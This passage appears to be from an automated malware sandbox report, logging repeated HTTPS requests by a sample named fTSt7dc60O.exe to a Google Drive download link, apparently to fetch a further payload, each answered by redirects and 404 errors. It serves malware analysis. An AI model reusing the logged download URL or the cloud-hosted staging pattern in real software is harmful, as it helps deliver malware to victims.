                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:17 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:17 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-cIjSTrM-zqqvMz3jUQ3vRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    65192.168.2.752250142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:18 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:19 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTf4FXDoalZDwr04025LGVKQSPmSk6BnRYaaRJULhZDYftohSGpwBVeGGd8FeQUe1xD
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:19 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-AGraDgHtaRFvNcblfixvfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 35 4a 2d 5a 73 70 4d 4e 61 78 65 6a 59 41 63 45 36 6a 69 6a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Q5J-ZspMNaxejYAcE6jijQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    66192.168.2.752251172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:19 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:20 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:20 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce--DbxiLZO1TKN-q586Kkxgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    67192.168.2.752252142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:20 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:21 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSL1uz_VrH_36FkOgcSfjl9mZ7z2oiNphIP-6Mh5y_yueGT42ql66dK6WLcIM5bUuR078VjD24
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:21 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-S9SwmJFYe-CTa6FZOAk84g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 75 31 4a 68 72 4b 72 4e 56 6f 49 67 71 79 66 5f 51 5f 37 49 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Hu1JhrKrNVoIgqyf_Q_7IQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    68192.168.2.752253172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:22 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:22 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:22 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-MHqpkwNB1sq08VdOB-MYVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    69192.168.2.752254142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:23 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:23 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSEUf-K29TV9HspK0iSDM7RCSRVKz_kA2P1kbpvXmXkwhwemq6I7T49-nmDdVhGUd_D
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:23 GMT
                                                    Content-Security-Policy: script-src 'nonce-Ym_zG50vr_fB-inpM67hIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 72 32 47 51 35 6f 78 59 52 73 45 6f 50 62 39 77 41 78 62 65 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5r2GQ5oxYRsEoPb9wAxbeg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    70192.168.2.752255172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:24 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:24 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:24 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-bIpuvhyvWmlbUenpdKAuzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    71192.168.2.752256142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:25 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:25 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC4BY1nMj23zxUvINk7iCRVYfwnM7SJyS59HLu01AxQcbEt_t1PMsBTa1puGL-7HJd-j
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:25 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-XNh2jNlbj1Z485zPG3wAcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
